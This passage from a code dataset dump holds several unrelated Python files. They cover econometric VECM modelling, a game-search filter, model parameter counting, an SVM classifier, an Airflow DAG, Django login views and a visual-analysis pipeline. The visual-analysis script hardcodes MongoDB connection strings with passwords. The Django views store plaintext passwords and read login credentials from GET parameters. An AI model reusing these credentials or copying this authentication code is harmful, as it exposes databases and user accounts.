k_ar_diff=2, method=\"trace\")\n    .summary()\n    .as_latex_tabular()\n)\n\nmodel = VECM(\n    endog=endogenas,\n    exog=exogenas,\n    deterministic=\"co\",\n    k_ar_diff=2,\n    coint_rank=1,\n    dates=series.index,\n    freq=\"MS\",\n    seasons=12,\n    first_season=3\n)\n\nvecm = model.fit()\n\nprint(vecm.summary())\n\nprint(vecm.summary().as_latex())\n\n\ndef impulso_resposta(ortogonal=True):\n    for resposta in vecm.names:\n        for impulso in vecm.names:\n            fig = vecm.irf(periods=24).plot(\n                response=resposta,\n                impulse=impulso,\n                orth=ortogonal\n            )\n            plt.gca().set_title(\"\")\n            plt.gca().set_xticklabels(plt.gca().get_xticks(), {\"size\": 16})\n            plt.gca().set_yticklabels(plt.gca().get_yticks(), {\"size\": 16})\n            plt.gca().xaxis.set_major_formatter(FuncFormatter(lambda x, _: '{:.0f}'.format(x)))\n            plt.gca().yaxis.set_major_formatter(FuncFormatter(lambda y, _: '{:.1f}'.format(y)))\n            fig.suptitle(\"\")\n            fig.set_figheight(3)\n            fig.set_figwidth(6)\n            plt.tight_layout()\n            plt.savefig(\n                \"../graficos/irf/orth_\" + resposta + \"_\" + impulso + \".pdf\"\n                if ortogonal\n                else \"../graficos/irf/\" + resposta + \"_\" + impulso + \".pdf\",\n                dpi=300\n            )\n\n\nimpulso_resposta()\nimpulso_resposta(False)\nplt.close(\"all\")\n\nvecm.irf(periods=24).plot(orth=True)\nplt.gcf().tight_layout()\nplt.gcf().suptitle(\"\")\nplt.gcf().savefig(\"../graficos/irf/irf_orth_completo.pdf\")\n\nvecm.irf(periods=24).plot(orth=False)\nplt.gcf().suptitle(\"\")\nplt.gcf().tight_layout()\nplt.gcf().savefig(\"../graficos/irf/irf_completo.pdf\")\n","repo_name":"phelipetls/mono","sub_path":"modelagem/vecm_model.py","file_name":"vecm_model.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"16053408022","text":"NORECORD = 'chưa có thông tin'  # Vietnamese: 'no information yet'\n\nclass Search():\n    def __init__(self, args):\n        self.platform = args['pf']\n        self.genre = args['ge']\n        self.lb = args['lb']\n        self.rb = args['rb']\n        self.age = args['age']\n        self.allowed_rating = args['ar']\n\n    # the user's filter choices\n    def print_rule(self):\n        print('【RULE】',self.platform, self.genre, self.lb, self.rb, self.age)\n\n    # apply the rule to produce the result\n    def qualified(self, game):\n        form = {}\n        if self.platform == 'Tất cả nền tảng':  # 'All platforms'\n            form['pf'] = True\n        else:\n            form['pf'] = self.platform\n\n        if self.genre == 'Tất cả thể loại':  # 'All genres'\n            form['ge'] = True\n        else:\n            form['ge'] = self.genre\n\n        return (game.platform == form['pf'] or bool(game.platform) == form['pf']) \\\n            and (game.genre == form['ge'] or bool(game.genre) == form['ge']) \\\n            and (game.year_of_release == NORECORD or game.year_of_release >= self.lb and game.year_of_release <= self.rb)\\\n            and game.age <= self.age \\\n            and game.rating in self.allowed_rating","repo_name":"tuannt2000/IT4652_V2","sub_path":"Search.py","file_name":"Search.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"11962838003","text":"import math\nimport random\nimport statistics\nimport sys\nimport time\nfrom argparse import ArgumentParser\n\nimport einops\nimport gradio as gr\nimport k_diffusion as K\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom einops import rearrange\nfrom omegaconf import OmegaConf\nfrom PIL import Image, ImageOps\nfrom torch import autocast\n\nsys.path.append(\"./stable_diffusion\")\n\nfrom stable_diffusion.ldm.util import instantiate_from_config\nfrom stable_diffusion.ldm.models.diffusion.ddpm_edit import LatentDiffusion\nfrom ldm.modules.attention import SpatialTransformer\n\n\ndef num_param(model):\n    return sum(p.numel() for p in model.parameters())
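\n\n# Quick check (added, illustrative): a torch.nn.Linear(10, 5) layer holds 10*5\n# weights plus 5 biases, so num_param(torch.nn.Linear(10, 5)) == 55.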
\n\n\ndef load_model_from_config(config, ckpt, vae_ckpt=None, verbose=False):\n    print(f\"Loading model from {ckpt}\")\n    pl_sd = torch.load(ckpt, map_location=\"cpu\")\n    if \"global_step\" in pl_sd:\n        print(f\"Global Step: {pl_sd['global_step']}\")\n    sd = pl_sd[\"state_dict\"]\n    if vae_ckpt is not None:\n        print(f\"Loading VAE from {vae_ckpt}\")\n        vae_sd = torch.load(vae_ckpt, map_location=\"cpu\")[\"state_dict\"]\n        sd = {\n            k: vae_sd[k[len(\"first_stage_model.\"):]]\n            if k.startswith(\"first_stage_model.\") else v\n            for k, v in sd.items()\n        }\n    model = instantiate_from_config(config.model)\n    m, u = model.load_state_dict(sd, strict=False)\n    if len(m) > 0 and verbose:\n        print(\"missing keys:\")\n        print(m)\n    if len(u) > 0 and verbose:\n        print(\"unexpected keys:\")\n        print(u)\n    return model\n\n\ndef profile_transformer(model):\n    print('num original:', num_param(model))\n    total = []\n    for layer in model.model.diffusion_model.input_blocks:\n        for sublayer in layer:\n            if isinstance(sublayer, SpatialTransformer):\n                print('input_blocks')\n                n = num_param(sublayer)\n                print('transformer:', n)\n                total.append(n)\n\n    for layer in model.model.diffusion_model.middle_block:\n        if isinstance(layer, SpatialTransformer):\n            print('middle')\n            n = num_param(layer)\n            print('transformer:', n)\n            total.append(n)\n\n    for layer in model.model.diffusion_model.output_blocks:\n        for sublayer in layer:\n            if isinstance(sublayer, SpatialTransformer):\n                print('output_blocks')\n                n = num_param(sublayer)\n                print('transformer:', n)\n                total.append(n)\n\n    print('total:', sum(total))\n\n\nif __name__ == \"__main__\":\n    path_config = \"configs/legacy/generate.yaml\"\n    path_ckpt = \"checkpoints/instruct-pix2pix-00-22000.ckpt\"\n    # path_config = \"configs/lowlight.yaml\"\n    # path_ckpt = \"checkpoints/low-light.ckpt\"\n    config = OmegaConf.load(path_config)\n\n    model: LatentDiffusion = load_model_from_config(config, path_ckpt, None)\n\n    num_unet = num_param(model.model)\n    num_ae = num_param(model.first_stage_model)\n    num_te = num_param(model.cond_stage_model)\n\n    print('UNet        :', num_unet)\n    print('Autoencoder :', num_ae)\n    print('TextEncoder :', num_te)\n    print('---------------------------')\n    print('Total       :', num_unet + num_ae + num_te)\n    print('finished')\n","repo_name":"KIMGEONUNG/IP2PInspection","sub_path":"counting/count_ae_params.py","file_name":"count_ae_params.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"35989530650","text":"from __future__ import division\nimport numpy as np\nfrom sklearn.svm import SVC\nfrom sklearn.externals import joblib\nimport os\nfrom collections import OrderedDict\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.tree import ExtraTreeClassifier\n\n\n\ntarget = []\nfeature_value = []\nfeature_value_test = []\nttrain = []\n\n\ndef classify(dict_tfidf, dict_target, model_path_dir):\n    for key in dict_tfidf:\n        name = dict_target.get(key, None)\n        name2 = dict_tfidf.get(key, None)\n        if name:\n            target.append(name)\n            feature_value.append(name2)\n    for i in range(len(target)):\n        if target[i] == 'Y':\n            ttrain.append(1)\n        else:\n            ttrain.append(0)\n    x = np.array(feature_value)\n    print(x)\n    y = np.array(ttrain)\n    sv = SVC(C=1, probability=True, random_state=20)
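\n    # Note (added): the Pipeline below names its steps 'feature_selection' and\n    # 'classification'; GridSearchCV's param_grid keys use scikit-learn's\n    # '<step>__<param>' convention, so 'classification__C' tunes C on the SVC.\n    pipe = Pipeline([('feature_selection', ExtraTreeClassifier()), 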
('classification', sv)])\n    param_grid = {'classification__C': [1, 10, 100, 1000], 'classification__gamma': [0.001, 0.0001],\n                  'classification__kernel': ['rbf', 'linear']}\n    clf = GridSearchCV(pipe, param_grid=param_grid, cv=4, verbose=10)  # initially cv=4\n    clf.fit(x, y)\n    path_save = os.path.join(model_path_dir, 'model.pkl')\n    joblib.dump(clf, path_save)\n    path_model = os.path.abspath(path_save)\n    return path_model\n\n\ndef classifier_predict(model_path, dict_test, output_path_dir):\n    proba = []\n    output = {}\n    for key in dict_test:\n        val = dict_test.get(key, None)\n        if val:\n            feature_value_test.append(val)\n\n    z = np.array(feature_value_test)\n    for subdir, dirs, files in os.walk(model_path):\n        for file_ in files:\n            if file_ == 'model.pkl':\n                model_file = subdir + os.path.sep + file_\n                estimator = joblib.load(model_file)\n                pred = estimator.predict_proba(z)[:, 1]\n                pred_accuracy = estimator.predict(z)\n                \n    k = 0\n    for key in dict_test.keys():\n        output[key] = pred[k]\n        k += 1\n    sorted_output = OrderedDict(sorted(output.items(), key=lambda s: s[0]))\n    ofile = os.path.join(output_path_dir, \"answers.txt\")\n    output_file = open(ofile, 'w')\n    for key, value in sorted_output.items():\n        output_file.write(key + \"\\t\" + str(round(value, 3)) + \"\\n\")\n    output_file.close()\n    path_output = os.path.abspath(ofile)\n    return path_output\n\n","repo_name":"yunitata/PAN15","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} {"seq_id":"86451734295","text":"import os\nfrom airflow import DAG\nfrom airflow.operators.bash import BashOperator\nfrom datetime import datetime, timedelta\n\nPROJECT_DIR = '/Users/christopherdancel/Documents/github/trading_bot/'\nPROJECT_MAIN = os.path.join(PROJECT_DIR, 'main.py')\nPYTHON_ENV = '/Users/christopherdancel/.virtualenvs/trading_bot_test/bin/python'\n\ndefault_args = {\n    'owner': 'me',\n    'schedule_interval': None,\n    'start_date': datetime(2015, 12, 1),\n    'retries': 0,\n}\ndag = DAG('trading_bot', catchup=False, default_args=default_args)\n\nt1 = BashOperator(\n    task_id='build_history',\n    bash_command=f\"cd {PROJECT_DIR} && {PYTHON_ENV} {PROJECT_MAIN} --build_history\",\n    dag=dag)\n\nt2 = BashOperator(\n    task_id='forecast',\n    bash_command=f'cd {PROJECT_DIR} && {PYTHON_ENV} {PROJECT_MAIN} --forecast',\n    dag=dag)\n\nt3 = BashOperator(\n    task_id='email',\n    bash_command=f'cd {PROJECT_DIR} && {PYTHON_ENV} {PROJECT_MAIN} --email',\n    dag=dag)\n\nt1 >> t2 >> t3\n","repo_name":"ChrisDancel/trading_bot","sub_path":"trading_bot_dag.py","file_name":"trading_bot_dag.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"73611155434","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nimport string\nimport random\nfrom captcha.image import ImageCaptcha\n\nfrom log_regapp.models import User\n\n\ndef login(request):\n    return render(request,'log_regapp/login.html')\n\n\n\ndef check_user(request):\n    name = request.GET.get(\"username\")\n    pwd = request.GET.get(\"userpwd\")\n    print(\"*******=======*************\")\n    result = User.objects.filter(email=name, password=pwd)\n    if result:\n        request.session['who']=result[0].nickname\n        request.session['status'] = '1'\n        return HttpResponse('0')\n    return HttpResponse(\"1\")\n\ndef checkcap(request):\n    captcha = 
request.GET.get(\"captcha\")\n    # print(captcha)  # we can get the captcha the user typed\n    cod0 = request.session.get(\"code\")\n    print(\"cod0==\", cod0)\n    if captcha.lower() == cod0.lower():\n        return HttpResponse(\"1\")\n    return HttpResponse(\"0\")\n\n\n\n\n\n\n\n\n\ndef regist(request):\n    return render(request,'log_regapp/regist.html')\n\n\n\n\ndef registlogic(request):\n    tel=request.POST.get('phone')\n    request.session['tel']=tel\n    nickname=request.POST.get('nickname')\n    password=request.POST.get('txt_password')\n    User.objects.create(email=tel,nickname=nickname,password=password,status=1)\n    request.session['who']=nickname\n    request.session['status']='1'\n    return redirect('log_regapp:regist_ok')\n\ndef regist_ok(request):\n    t=request.session.get('tel')\n    n=request.session.get('who')\n    del request.session['tel']\n    print(t)\n    return render(request,'log_regapp/regist_ok.html',{'T':t,'N':n})\n\n\n\n\n\n\n\n\n\n\n\n\n\n# ajax check: does the registration number already exist?\ndef check(request):\n    name = request.GET.get(\"username\")\n    print(name, \"====================\")  # the value is received\n\n    result = User.objects.filter(email=name)  # compare against the database\n    print(result, \"result\")\n    if result:\n        # return HttpResponse(\"right_3.jpg\")\n        return HttpResponse(\"0\")  # 0 means it already exists\n    if name:\n        return HttpResponse(\"1\")  # 1 means it passes\n    return HttpResponse(\"0\")\n\n\n\n\n# generate a captcha\n\ndef getcaptcha(request):\n    image = ImageCaptcha()  # construct an ImageCaptcha object\n    code = random.sample(string.ascii_letters + string.digits, 5)  # randomly pick 5 characters\n    code = \"\".join(code)\n    print(code)\n    request.session[\"code\"] = code  # store the captcha in the session\n    data = image.generate(code)\n    print(data)\n    return HttpResponse(data, \"image/png\")\n\n\n\n\n\n\ndef indent(request):\n    return render(request,'log_regapp/indent.html')\n\n\n\ndef order_info(request):\n    name=request.POST.get('receive_people')\n    print(name)\n    address=request.POST.get('position')\n    post_code=request.POST.get('post_code')\n    tel=request.POST.get('tel')\n    cart=request.session.get('cart')\n    print(name,address,post_code,tel)\n    return redirect('payapp:page1', cart.total_price)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"brytlevson/dbook1","sub_path":"log_regapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"39855523328","text":"from pymongo import MongoClient\nimport time\nimport requests\nfrom bson.json_util import ObjectId\nimport json\nfrom web_functions import WebFunctions\nimport cv2\nimport os\nimport predictors\nfrom collections import Counter\nfrom keras.models import load_model\nfrom datetime import datetime\nimport tensorflow as tf\nimport numpy as np\nimport subprocess\n# from pixellib.instance import instance_segmentation\nfrom pixellib.semantic import semantic_segmentation\nimport cv2\nfrom imutils import paths\nimport imutils\nfrom os.path import exists\nimport matplotlib.pyplot as plt\nimport logging\nfrom PST.model import WCT2\nfrom PST.data_processing import build_input_pipe, restore_image\nfrom PST.utils import http_get_img, get_local_img, display_outputs\n\n# ============= For log file ============= #\nlf = open(\"logfilename.log\", \"w\") # Create a new log file to keep record only for current analysis\n\n# Define log file - it will contain anything printed in console\nlogging.basicConfig(filename=\"logfilename.log\", level=logging.INFO)\n\nMONGO_URI = \"mongodb+srv://dora_user:wk9NmSQIPqgXNf8O@doracluster.se2tb.mongodb.net/ImagesDB?ssl=true&ssl_cert_reqs=CERT_NONE\" # Atlas MongoDB\n# MONGO_URI = \"mongodb://xr4d_visuals_user:B6^M2qAe@xr4drama.iti.gr:27017/XR4D_Visual_Analysis_DB\" # Local MongoDB\ndb = MongoClient(MONGO_URI)\n\n\ndef detect_blur_fft(image, size=60, thresh=10):\n    # grab the dimensions of the image and use the dimensions to\n    # derive the center (x, y)-coordinates\n    (h, w) = image.shape\n    (cX, cY) = (int(w / 2.0), int(h / 2.0))\n\n    # compute the FFT to find the frequency transform, then shift\n    # the zero frequency component (i.e., DC component located at\n    # the top-left corner) to the center where it will be\n    # easier to analyze\n\n    fft = np.fft.fft2(image)\n    fftShift = np.fft.fftshift(fft)\n\n    # zero-out the center of the FFT shift (i.e., remove low\n    # frequencies), apply the inverse shift such that the DC\n    # component once again becomes the top-left, and then apply\n    # the inverse FFT\n    fftShift[cY - size:cY + size, cX - size:cX + size] = 0\n    fftShift = np.fft.ifftshift(fftShift)\n    recon = np.fft.ifft2(fftShift)\n\n    # compute the magnitude spectrum of the reconstructed image,\n    # then compute the mean of the magnitude values\n    magnitude = 20 * np.log(np.abs(recon))\n    mean = np.mean(magnitude)\n    # the image will be considered \"blurry\" if the mean value of the\n    # magnitudes is less than the threshold value\n    return (mean, mean <= thresh)
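\n\n# Example (added for illustration): the analysis below applies this detector\n# to a resized grayscale frame, roughly:\n#   gray = cv2.cvtColor(imutils.resize(frame, width=500), cv2.COLOR_BGR2GRAY)\n#   mean, blurry = detect_blur_fft(gray, size=60, thresh=18)\n# A larger mean means more high-frequency content, i.e. a sharper frame.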
\"mongodb://xr4d_visuals_user:B6^M2qAe@xr4drama.iti.gr:27017/XR4D_Visual_Analysis_DB\" # Local MongoDB\ndb = MongoClient(MONGO_URI)\n\n\ndef detect_blur_fft(image, size=60, thresh=10):\n # grab the dimensions of the image and use the dimensions to\n # derive the center (x, y)-coordinates\n (h, w) = image.shape\n (cX, cY) = (int(w / 2.0), int(h / 2.0))\n\n # compute the FFT to find the frequency transform, then shift\n # the zero frequency component (i.e., DC component located at\n # the top-left corner) to the center where it will be more\n # easy to analyze\n\n fft = np.fft.fft2(image)\n fftShift = np.fft.fftshift(fft)\n\n # zero-out the center of the FFT shift (i.e., remove low\n # frequencies), apply the inverse shift such that the DC\n # component once again becomes the top-left, and then apply\n # the inverse FFT\n fftShift[cY - size:cY + size, cX - size:cX + size] = 0\n fftShift = np.fft.ifftshift(fftShift)\n recon = np.fft.ifft2(fftShift)\n\n # compute the magnitude spectrum of the reconstructed image,\n # then compute the mean of the magnitude values\n magnitude = 20 * np.log(np.abs(recon))\n mean = np.mean(magnitude)\n # the image will be considered \"blurry\" if the mean value of the\n # magnitudes is less than the threshold value\n return (mean, mean <= thresh)\n\n\ndef visual_analysis(simmoid, sendtoKB, sendtoRec, pst):\n\n # Update request's status in MongoDB\n # db.ImagesDB.InputQueue.update_one(filter={\"input.simmoid\": input[\"simmoid\"]}, update= {\"$set\": {\"status\": 1}}) # 1: In Progress\n # print(\"Input with simmoid {} is being analyzed!\")\n\n # visual_analysis(input)\n print(\"[INFO] Analyzing input with simmoid {}. Please wait...\".format(simmoid))\n logging.info(\"Analyzing input with simmoid {}. Please wait...\".format(simmoid))\n\n # ------------------------------------------------------------------------------ #\n # ----------------------------- Vusual Analysis -------------------------------- #\n # ------------------------------------------------------------------------------ #\n # time.sleep(2) # Simulating visual analysis\n # test() # Testing the usage of functions from other py files\n\n # Get request from MongoDB by simmoid\n input_request = db.ImagesDB.InputQueue.find_one(filter={\"input.simmoid\": simmoid})['input']\n # input_request = db.XR4D_Visual_Analysis_DB.InputQueue.find_one(filter={\"input.simmoid\": simmoid})['input']\n # print(input_request)\n\n # Check entity: image, video or twitter_post?\n entity = input_request['entity']\n print(\"[INFO] Entity: \", entity)\n logging.info(\"Entity: \", entity)\n\n # Get and keep project_id to send to KB, (3D rec and geoserver?)\n project_id = input_request['project_id']\n print(\"project id: \", project_id)\n logging.info(\"project id: \", project_id)\n\n ####################################################################################################################\n # ====================== TWITTER POST ======================== # TWITTER POST\n ####################################################################################################################\n # Check if the input is a twitter post and proceed with proper analysis\n flag_twitter = False\n entities = []\n urls = []\n if entity == \"twitter_post\":\n print(\"[INFO] Analyzing input twitter post...\")\n logging.info(\"Analyzing input twitter post...\")\n\n flag_twitter = True\n\n # simmo_id = request_json[\"simmoid\"]\n\n # Get JSON file with info\n r = WebFunctions.get_json(simmoid, entity)\n input_json = r.json()\n # 
print(input_json)\n items = input_json[\"items\"]\n len_items = len(items)\n print(\"Length of items list\", len(items))\n logging.info(\"Length of items list\", len(items))\n for i in range(1, len_items):\n current_item = items[i][0]\n dictionary = current_item[1]\n print(dictionary[\"url\"])\n logging.info(dictionary[\"url\"])\n print(dictionary[\"type\"])\n logging.info(dictionary[\"type\"])\n urls.append(dictionary[\"url\"])\n entities.append(dictionary[\"type\"])\n\n ####################################################################################################################\n # ====================== IMAGE ANALYSIS ======================== # IMAGE\n ####################################################################################################################\n # Check if the input is an image, a video or a twitter post and proceed with proper analysis\n if entity == \"image\" or \"image\" in entities or \"IMAGE\" in entities:\n print(\"[INFO] Analyzing input image...\")\n logging.info(\"Analyzing input image...\")\n\n # Check if entity comes from a Twitter Post:\n if flag_twitter:\n\n # Defile subpaths\n image_path = \"Data/\" + entity + \"_\" + simmoid + \"/\"\n only_filename = simmoid + \".jpg\"\n save_filename = image_path + only_filename # This is the path/filename where the downloaded video will be saved # ToDo: Folders\n\n # Create directory to save image if it does not exist\n if not os.path.exists(image_path):\n os.makedirs(image_path)\n # Download image (# TODO: This works only for 1 image/item now - Do for multiple!!!\n url = urls[0]\n\n print(\"[INFO] Image will be downloaded from \", url)\n\n # Count time to download video and split it in frames\n t1 = time.time()\n\n # --------------------> Download image\n WebFunctions.download_from_url(url, image_path, only_filename) # TODO: uncommend this once server is up\n\n # # TODO: commend this ---------------\n # online_image = requests.get(url)\n # print(online_image)\n #\n # if online_image.status_code == 200:\n # open(save_filename, 'wb').write(online_image.content)\n # # TODO: ------------------------------\n\n image = cv2.imread(save_filename)\n print(\"[INFO] Loaded image: \", simmoid + \".jpg\")\n logging.info(\"Loaded image: \", simmoid + \".jpg\")\n\n # --------------------- Create JSON for KB -----------------------#\n # For KB - Information only per video shot\n KB_JSON = {}\n KB_JSON[\"header\"] = {\"timestamp\": str(datetime.now(tz=None)), \"sender\": \"Visual Analysis\", \"entity\": entity,\n \"simmoid\": simmoid, \"project_id\": project_id} # ToDo\n KB_JSON[\"shotInfo\"] = []\n\n # Save extracted info for each image for KB\n shot_info_dict_KB = {}\n shot_info_dict_KB[\"shotIdx\"] = 0\n shot_info_dict_KB[\"startFrame\"] = 0\n shot_info_dict_KB[\"endFrame\"] = 0\n # shot_info_dict_KB[\"area\"] = []\n # shot_info_dict_KB[\"areaProb\"] = []\n # shot_info_dict_KB[\"outdoor\"] = []\n # shot_info_dict_KB[\"emergencyType\"] = []\n # shot_info_dict_KB[\"emergencyProb\"] = []\n shot_info_dict_KB[\"objectsFound\"] = []\n shot_info_dict_KB[\"peopleInDanger\"] = 0\n shot_info_dict_KB[\"vehiclesInDanger\"] = 0\n shot_info_dict_KB[\"riverOvertop\"] = False\n\n # --------------------- Load ML models -----------------------#\n\n # load model for SR # ToDo: way not load model everytime?\n SR_model = load_model('Trained_models/SR/xr4drama_places_model_ep5_bs32.h5')\n print(\"[INFO] SR model is successfully loaded!\")\n logging.info(\"SR model is successfully loaded!\")\n\n # load model for EmC\n EmC_model = 
load_model('Trained_models/EmC/vgg16_places2_lastconv_19ep_1e-03lr_MME2017.pkl')\n print(\"[INFO] EmC model is successfully loaded!\")\n logging.info(\"EmC model is successfully loaded!\")\n\n if pst:\n # load model for PST\n # train_tfrec = \"PST/tfrecords/train.tfrec\"\n # val_tfrec = \"PST/tfrecords/val.tfrec\"\n\n model = WCT2(image_size=None, lr=1e-4, gram_loss_weight=1.0)\n model.wct.load_weights(model.checkpoint_path)\n # model.train(train_tfrec, epochs=10, batch_size=8)\n\n model.wct.save_weights(model.checkpoint_path)\n\n print(\"[INFO] PST model is successfully loaded!\")\n logging.info(\"PST model is successfully loaded!\")\n\n # load model for BOL\n semantic_segmentation_model = semantic_segmentation()\n semantic_segmentation_model.load_ade20k_model(\"Trained_models/BOL/Pixellib/deeplabv3_xception65_ade20k.h5\")\n print(\"[INFO] BOL model is successfully loaded!\")\n logging.info(\"BOL model is successfully loaded!\")\n\n # --------------------- Scene Recognition (SR)-----------------------#\n\n # Run SR model\n scene, sr_prob, is_outdoor = predictors.SR_model(image, SR_model)\n # SR_model.clear\n\n shot_info_dict_KB[\"area\"] = scene\n shot_info_dict_KB[\"areaProb\"] = sr_prob/100\n shot_info_dict_KB[\"outdoor\"] = is_outdoor\n\n # --------------------- Emergency Classification (EmC) ---------------------#\n\n # Run EmC model\n emergency, emc_prob = predictors.EmC_model(image, EmC_model)\n\n shot_info_dict_KB[\"emergencyType\"] = emergency\n shot_info_dict_KB[\"emergencyProb\"] = np.float64(emc_prob)\n # emergencies.append(emergency)\n # emc_probs.append(emc_prob)\n\n # Check if we will use PST or not\n if pst:\n # --------------------- Photorealistic Style Transfer (PST) ---------------------#\n # rst = None\n rst = 64 * 14 # (896)\n # test_id = np.random.randint(1, 60)\n # test_id = 20\n\n # start = datetime.datetime.now()\n # content = get_local_img(\"./examples/input/tar55.png\".format(test_id), rst)\n content = get_local_img(image_path + str(simmoid) + \".jpg\", rst)\n style = get_local_img(\"PST/examples/style/tar44.png\", rst)\n\n output = model.transfer(tf.cast(content, tf.float32), tf.cast(style, tf.float32), 0.8)\n\n plt.imsave(image_path + str(simmoid) + \"_pst.jpg\", output[0] / 255.0)\n\n # -------------- Building and Object Localization (BOL) ---------------#\n # Run BOL model\n segvalues, objects_masks, image_overlay = semantic_segmentation_model.segmentAsAde20k(\n image_path + str(simmoid) + \"_pst.jpg\", overlay=False, extract_segmented_objects=True,\n output_image_name=image_path + str(simmoid) + \"_mask.png\")\n else:\n\n # -------------- Building and Object Localization (BOL) ---------------#\n\n # Run BOL model\n # segvalues, segoverlay = semantic_segmentation_model.segmentAsAde20k(\n # image_path + str(simmoid) + \".jpg\", overlay=False,\n # output_image_name=image_path + str(simmoid) + \"_mask.png\")\n segvalues,image_overlay = semantic_segmentation_model.segmentAsAde20k(\n image_path + str(simmoid) + \".jpg\", overlay=False,\n output_image_name=image_path + str(simmoid) + \"_mask.png\")\n\n for l in range(0, len(segvalues['class_names'])):\n objects_dict = {'type': segvalues['class_names'][l], 'probability': segvalues['ratios'][l] / 100}\n shot_info_dict_KB['objectsFound'].append(objects_dict)\n\n # print(frames_path + \"frame_\" + str(frame_idx) + \".jpg\")\n\n KB_JSON[\"shotInfo\"].append(shot_info_dict_KB)\n\n print(KB_JSON[\"shotInfo\"])\n logging.info(KB_JSON[\"shotInfo\"])\n\n # Save KB_JSON file\n with open(image_path + 'KB.json', 'w') as f:\n 
json.dump(KB_JSON, f)\n\n # Save output for KB (maybe this will be inside the analysis function)\n db.ImagesDB.VisualsOutputKB.insert_one(KB_JSON)\n # db.XR4D_Visual_Analysis_DB.VisualsOutputKB.insert_one(KB_JSON)\n\n #################################################################################################################\n # ====================== VIDEO ANALYSIS ======================== # VIDEO\n #################################################################################################################\n # Check if the input is a video and proceed with proper analysis\n if entity == \"video\" or \"video\" in entities or \"VIDEO\" in entities:\n print(\"[INFO] The analysis for input video is starting...\")\n logging.info(\"The analysis for input video is starting...\")\n\n if flag_twitter == True:\n url = urls[0] # ToDo: This supports only 1 video from Twitter <--- support > 1\n else:\n # TODO ---> uncomment once xr4drama server is up\n # simmo_id = request_json[\"simmoid\"]\n\n # Get JSON file with info\n r = WebFunctions.get_json(simmoid, entity)\n input_json = r.json()\n print(input_json)\n logging.info(input_json)\n\n # Get video url\n if \"alternativeUrl\" in input_json.keys():\n if not input_json[\"alternativeUrl\"] == '':\n url = input_json[\"alternativeUrl\"]\n else:\n url = input_json[\"url\"]\n else:\n url = input_json[\"url\"]\n\n if not os.path.exists(\"Data\"):\n os.makedirs(\"Data\")\n\n # Defile subpaths\n video_path = \"Data/\" + entity + \"_\" + simmoid + \"/\"\n frames_path = video_path + \"Frames/\"\n masks_path = video_path + \"Masks/\"\n proc_frames_path = video_path + \"Proc_Frames/\"\n pst_frame_path = video_path + \"PST_Frames/\"\n only_filename = simmoid + \".mp4\"\n save_filename = video_path + only_filename # This is the path/filename where the downloaded video will be saved # ToDo: Folders\n\n # Create directory to save video if it does not exist\n if not os.path.exists(video_path):\n os.makedirs(video_path)\n\n # Create directory to save masks if it does not exist\n if not os.path.exists(masks_path):\n os.makedirs(masks_path)\n\n # Create directory to save processed frames if it does not exist\n if not os.path.exists(proc_frames_path):\n os.makedirs(proc_frames_path)\n\n # Create directory to save video frames\n if not os.path.exists(frames_path) or not exists(video_path+\"avg_blurriness.txt\"):\n os.makedirs(frames_path, exist_ok=True)\n\n print(\"[INFO] Video will be downloaded from \", url)\n logging.info(\"Video will be downloaded from \", url)\n\n # Count time to download video and split it in frames\n t1 = time.time()\n\n # --------------------> Download video\n WebFunctions.download_from_url(url, video_path, only_filename) #TODO: uncommend this once server is up\n\n # TODO: commend this ---------------\n online_video = requests.get(url)\n print(online_video)\n logging.info(online_video)\n\n if online_video.status_code == 200:\n open(save_filename, 'wb').write(online_video.content)\n # TODO: ------------------------------\n\n video_cap = cv2.VideoCapture(save_filename)\n print(\"[INFO] Loaded video: \", simmoid + \".mp4\")\n logging.info(\" Loaded video: \", simmoid + \".mp4\")\n\n # Read and save every video frame\n print(\"[INFO] Splitting video in frames...\")\n logging.info(\"Splitting video in frames...\")\n blur_idx = 0 # number of frames with mean >= 0\n blur_avg = 0\n frame_idx = 0\n while video_cap.isOpened():\n ret, frame = video_cap.read()\n # if frame is read correctly ret is True\n if not ret:\n print(\"[INFO] Can't get another 
frame. Exiting ...\")\n logging.info(\"Can't get another frame. Exiting ...\")\n break\n else:\n cv2.imwrite(frames_path + \"frame_\" + str(frame_idx) + \".jpg\", frame)\n frame_idx = frame_idx + 1\n\n # Detect blurry frames, get the avg mean value to set threshold\n frame_resized = imutils.resize(frame, width=500)\n gray_frame = cv2.cvtColor(frame_resized, cv2.COLOR_BGR2GRAY)\n\n # apply our blur detector using the FFT\n (mean, blurry) = detect_blur_fft(gray_frame, size=60, thresh=18)\n\n if mean >= 0:\n blur_avg = blur_avg + mean\n blur_idx = blur_idx + 1\n\n video_cap.release()\n print(\"[INFO] Number of frames: {}, Frames are saved in {}\".format(frame_idx - 1, frames_path))\n logging.info(\"Number of frames: {}, Frames are saved in {}\".format(frame_idx - 1, frames_path))\n blur_avg = blur_avg/(blur_idx)\n\n # Write this in a txt file\n with open(video_path+\"avg_blurriness.txt\", \"w\") as blur_file:\n blur_file.write(str(blur_avg))\n\n t2 = time.time()\n print(t2 - t1, \" sec\")\n logging.info(t2 - t1, \" sec\")\n else:\n with open(video_path+\"avg_blurriness.txt\", \"r\") as blur_file:\n blur_avg = float(blur_file.readline())\n\n print(\"[INFO] Average blurriness in video is \", blur_avg)\n logging.info(\"Average blurriness in video is \", blur_avg)\n\n # --------------------------> Shot Detection\n print(\"[INFO] Splitting video into shots...\")\n logging.info(\"Splitting video into shots...\")\n # Count time for video shot detection\n t1 